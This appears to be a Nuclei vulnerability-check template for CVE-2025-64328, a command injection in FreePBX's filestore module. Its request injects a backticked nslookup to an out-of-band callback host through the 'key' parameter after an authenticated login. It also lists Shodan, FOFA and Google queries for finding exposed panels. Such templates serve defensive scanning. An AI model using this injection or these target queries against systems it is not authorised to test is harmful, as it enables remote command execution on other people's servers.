README.md
Rendering markdown...
id: CVE-2025-64328
info:
name: FreePBX - Authenticated Command Injection in Administration panel
author: _th3y
severity: high
description: |
FreePBX 17 contains a command injection caused by insufficiently sanitized user-supplied data in the testconnection -> check_ssh_connect() function within the filestore module, allowing authenticated attackers execute arbitrary shell commands as the asterisk user.
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
cvss-score: 8.6
cve-id: CVE-2025-64328
cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*
reference:
- https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw
- https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/
metadata:
vendor: sangoma
product: freepbx
shodan-query:
- http.title:"freepbx"
- http.favicon.hash:"-1908328911"
- http.favicon.hash:"1574423538"
- http.title:"freepbx administration"
fofa-query:
- icon_hash="-1908328911"
- icon_hash="1574423538"
- title="freepbx administration"
- title="freepbx"
google-query:
- intitle:"freepbx administration"
- intitle:"freepbx"
tags: cve,cve2025,freepbx,rce,oast,authenticated,vuln
variables:
username: "{{username}}"
password: "{{password}}"
cmd: "nslookup {{interactsh-url}}"
prefix: "{{rand_text_alpha(5)}}"
flow: http(1) && http(2)
http:
- method: POST
path:
- "{{BaseURL}}/admin/config.php"
headers:
Content-Type: application/x-www-form-urlencoded
body: "username={{username}}&password={{password}}"
matchers:
- type: word
part: body
words:
- 'FreePBX Administration'
- 'Hello, {{username}}'
condition: and
internal: true
- method: GET
path:
- "{{BaseURL}}/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user={{prefix}}&port=22&key={{prefix}}`{{cmd}}`&path={{prefix}}"
headers:
Referer: "{{BaseURL}}"
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- "http"